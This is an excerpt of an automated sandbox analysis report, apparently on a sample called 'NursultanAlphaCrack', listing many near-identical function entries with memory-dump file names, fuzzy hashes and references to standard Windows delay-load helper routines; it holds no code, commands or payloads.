Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cd5ee481adef92bfaad209bc51bde6b600c57bd38b12962cf9fcb285be551ff5
Instruction ID: aa3a03f147aa178d96aadd87f65c1f7b08025eca0e6a784c139fbce560b436af
Opcode Fuzzy Hash: cd5ee481adef92bfaad209bc51bde6b600c57bd38b12962cf9fcb285be551ff5
Instruction Fuzzy Hash: 45B012C526C0457C710871643D06C3B014CC0E1F22330413FF410CC681AA405E043471

Function 001DE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE51F

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b51fd80f537673b6c53518d45741668ac81e726519da9ec4b809c3c93b4064a1
Instruction ID: 4e35a5f4e9edfdad2fac8f55359903fff6653c72947bc0c19eef22f61568a17c
Opcode Fuzzy Hash: b51fd80f537673b6c53518d45741668ac81e726519da9ec4b809c3c93b4064a1
Instruction Fuzzy Hash: 07B012C526C0457D7108B1483D02D3B018CC0D1F22370422FF404CC380EA405D003471

Function 001DE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE51F

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fa98938ae66c5f846057e6972c4bff752c6aeac9d19120b9b6afbc6e1c563f98
Instruction ID: ddb732f571ba16fdd480bcc3734f0725f117628efe741eda0223b4874ad8641f
Opcode Fuzzy Hash: fa98938ae66c5f846057e6972c4bff752c6aeac9d19120b9b6afbc6e1c563f98
Instruction Fuzzy Hash: 04B012C536C0857C7108B1483E02C3B058CC0D1F22370812FF504CC380EA405D013471

Function 001DE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE51F

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 06037ab4480c22dee6a010414c931b99c8bf8b315fd0a01d8531f3c4f32a998d
Instruction ID: 8aaef055ddf645054dd0e5b26895e207110d484563c4c704c052f6031c049313
Opcode Fuzzy Hash: 06037ab4480c22dee6a010414c931b99c8bf8b315fd0a01d8531f3c4f32a998d
Instruction Fuzzy Hash: 5DB012C526C1457C7208B1487D03C3B018CC0D1F22330432FF404CC380EA405D443475

Function 001DE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE580

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fd32798aea6dcb0097acd3ddeeb37ccc1c3353171864d9f5e0ea8ed3f188ef67
Instruction ID: 6ca9af51548398cc87c57b208d2ec4b4528e7f089672c0801c1d60d5045bfd17
Opcode Fuzzy Hash: fd32798aea6dcb0097acd3ddeeb37ccc1c3353171864d9f5e0ea8ed3f188ef67
Instruction Fuzzy Hash: FCB012C52AC0587D7108F1943D02C37018CC4C0B23331412FF408C93C0EA401C202471

Function 001DE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE580

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6e2b177eff1d2792391402b1590124921a821ba591e2353bccf3132d798425b8
Instruction ID: c4f6121d229b4c01012693a9f6b5c5d335b1e628f7f0bce4a47d598345d38818
Opcode Fuzzy Hash: 6e2b177eff1d2792391402b1590124921a821ba591e2353bccf3132d798425b8
Instruction Fuzzy Hash: 17B012C52AC1547C7148F1947D03C37019CC4C0B23331422FF408C93C0EB401C602471

Function 001DE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE580

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fa4b86b1c550cbe5e45d72fc918846a9588888f9c5a526bdc354c24737932c85
Instruction ID: dc9f0fa999f7cc96e041257e8b2cf380342d29938f5dffbac55ebdd1fac46425
Opcode Fuzzy Hash: fa4b86b1c550cbe5e45d72fc918846a9588888f9c5a526bdc354c24737932c85
Instruction Fuzzy Hash: 54B092C56A80547C7108B1946A02C370198C480B22321422BB408C9280AA4019212471

Function 001DE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 26d87084d4b96b938895755ad2f452a40ba7e785f5ee36084f54738154c1d371
Instruction ID: 9920b34da7be1619ace1c1f27735141063eaa72607d48038194ae00c133ae4b3
Opcode Fuzzy Hash: 26d87084d4b96b938895755ad2f452a40ba7e785f5ee36084f54738154c1d371
Instruction Fuzzy Hash: DBA011E22A808A3C300832002E02C3B02ACC8C0B22330802FF828E8280AE80280028B2

Function 001DE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 08ee5352fbf1d87d1c8fbe63ac71d9d7dfbfb4bbcea022531b71e437dea9b77c
Instruction ID: 98155e08e73183cf08cf6df6ed2e89f20212bfa4604833a4955e251682e33ba0
Opcode Fuzzy Hash: 08ee5352fbf1d87d1c8fbe63ac71d9d7dfbfb4bbcea022531b71e437dea9b77c
Instruction Fuzzy Hash: BAA011E22AC08ABC300832002E02C3B02ACC8C0B22330882FF80AC8280AA80280028B2

Function 001DE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2b38a8555f0fd19cb34d2575dd9517c39455c240428ac02ba80d0b210279592b
Instruction ID: 98155e08e73183cf08cf6df6ed2e89f20212bfa4604833a4955e251682e33ba0
Opcode Fuzzy Hash: 2b38a8555f0fd19cb34d2575dd9517c39455c240428ac02ba80d0b210279592b
Instruction Fuzzy Hash: BAA011E22AC08ABC300832002E02C3B02ACC8C0B22330882FF80AC8280AA80280028B2

Function 001DE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: de007fad2795c2b69cbf99d99367a992bc1501814efa7fc68c090cf4da4d89e6
Instruction ID: 98155e08e73183cf08cf6df6ed2e89f20212bfa4604833a4955e251682e33ba0
Opcode Fuzzy Hash: de007fad2795c2b69cbf99d99367a992bc1501814efa7fc68c090cf4da4d89e6
Instruction Fuzzy Hash: BAA011E22AC08ABC300832002E02C3B02ACC8C0B22330882FF80AC8280AA80280028B2

Function 001DE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d9c5867216365c6b58433ef8f41517f896ca96dc730bb668df66b05564f131ea
Instruction ID: 98155e08e73183cf08cf6df6ed2e89f20212bfa4604833a4955e251682e33ba0
Opcode Fuzzy Hash: d9c5867216365c6b58433ef8f41517f896ca96dc730bb668df66b05564f131ea
Instruction Fuzzy Hash: BAA011E22AC08ABC300832002E02C3B02ACC8C0B22330882FF80AC8280AA80280028B2

Function 001DE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cbfb57d715a3badb25a8e866db74e2f9230e3dddd1aa0220b172090349b7c011
Instruction ID: 98155e08e73183cf08cf6df6ed2e89f20212bfa4604833a4955e251682e33ba0
Opcode Fuzzy Hash: cbfb57d715a3badb25a8e866db74e2f9230e3dddd1aa0220b172090349b7c011
Instruction Fuzzy Hash: BAA011E22AC08ABC300832002E02C3B02ACC8C0B22330882FF80AC8280AA80280028B2

Function 001DE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE51F

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 35851f9219b30c4aa6d0b42199c673536899de89cefcdcdae769931e507d18ea
Instruction ID: 870437821b6f03062069342634a2801930d199fddcdaca6594df7ef740d43922
Opcode Fuzzy Hash: 35851f9219b30c4aa6d0b42199c673536899de89cefcdcdae769931e507d18ea
Instruction Fuzzy Hash: 27A012C515C0467C700831002D02C3B014CC0D1F62330451FF401CC2806A401C003470

Function 001DE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE51F

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 76b824799eae8e75029ec28216fb66e2c8847e09ec93cb502756e04320d42f95
Instruction ID: 870437821b6f03062069342634a2801930d199fddcdaca6594df7ef740d43922
Opcode Fuzzy Hash: 76b824799eae8e75029ec28216fb66e2c8847e09ec93cb502756e04320d42f95
Instruction Fuzzy Hash: 27A012C515C0467C700831002D02C3B014CC0D1F62330451FF401CC2806A401C003470

Function 001DE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE51F

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 463d5678b1cff3d42d1f181324625debd911694d6aee57a49ac99ccf6dd39d36
Instruction ID: 870437821b6f03062069342634a2801930d199fddcdaca6594df7ef740d43922
Opcode Fuzzy Hash: 463d5678b1cff3d42d1f181324625debd911694d6aee57a49ac99ccf6dd39d36
Instruction Fuzzy Hash: 27A012C515C0467C700831002D02C3B014CC0D1F62330451FF401CC2806A401C003470

Function 001DE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE580

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7937dcb0fc1d226f4dd5f56da46a80e36a46ded6417d23cb97ebd155316ec06b
Instruction ID: 87e1ee6b85c02e589a8efed055e6c2b2728e2ef40d7a0a0068b9f073075e5c64
Opcode Fuzzy Hash: 7937dcb0fc1d226f4dd5f56da46a80e36a46ded6417d23cb97ebd155316ec06b
Instruction Fuzzy Hash: 3FA011CA2E80883CB008B2A02E02C3B028CC8E0B23332822FF800C82C0AA80280028B0

Function 001DE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE51F

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
